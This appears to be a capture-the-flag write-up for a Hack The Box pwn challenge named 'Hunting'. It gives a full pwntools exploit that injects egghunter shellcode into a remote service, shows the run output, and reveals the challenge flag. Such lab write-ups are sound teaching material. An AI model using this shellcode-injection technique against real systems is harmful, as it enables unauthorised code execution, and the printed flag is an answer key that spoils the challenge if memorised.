Hunting

3KB

archive

I've hidden the flag very carefully, you'll never manage to find it! Please note that the goal is to find the flag, and not to obtain a shell.

decompiling the binary using Hex-Rays or any other decompilers like ninja,ghidra ...etc, used decompiler explorer to search through the decpmiled code easily

when i search for the flag in the code we find that the flag is hardcoded in the binary into the stack

The string "aHtbXxxxxxxxxxx" which holds the flag is copied into the mapped memory region dest using strcpy

to hunt the flag we are going to use egghunter shellcode which searches the memory for the byte sequence given as a parameter

pwnlib.shellcraft.i386 — Shellcode for Intel 80386 — pwntools 4.15.0 documentationdocs.pwntools.com

Exploit :

from pwn import *

# io = process('./hunting')
io = remote('83.136.249.57', 30765)

# edi will point to the random memory are with the string HTB{
shellcode = asm(shellcraft.i386.linux.egghunter('HTB{'))

# execute write syscall to print the flag
shellcode += asm('''
	xor eax, eax
	xchg ecx, ebx
	inc ebx
	mov al, 0x4
	int 0x80
''')

io.sendline(shellcode)
print(io.recvall())

let's execute the exploit locally and remotely

┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Starting local process './hunting': pid 96508
[+] Receiving all data: Done (1.00KB)
[*] Stopped process './hunting' (pid 96508)
b'HTB{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}\x00\x00\x00\x00\x00\x00\x00\...

remotely

┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Opening connection to 83.136.249.57 on port 30765: Done
[+] Receiving all data: Done (1.06KB)
[*] Closed connection to 83.136.249.57 port 30765
b'HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}\x00\x00\x00\x00\x00\x00\

Flag :

HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}

PreviousRacecar NextYou know 0xDiablos

Last updated 2 years ago

hashtagExploit :

hashtagFlag :

Exploit :

Flag :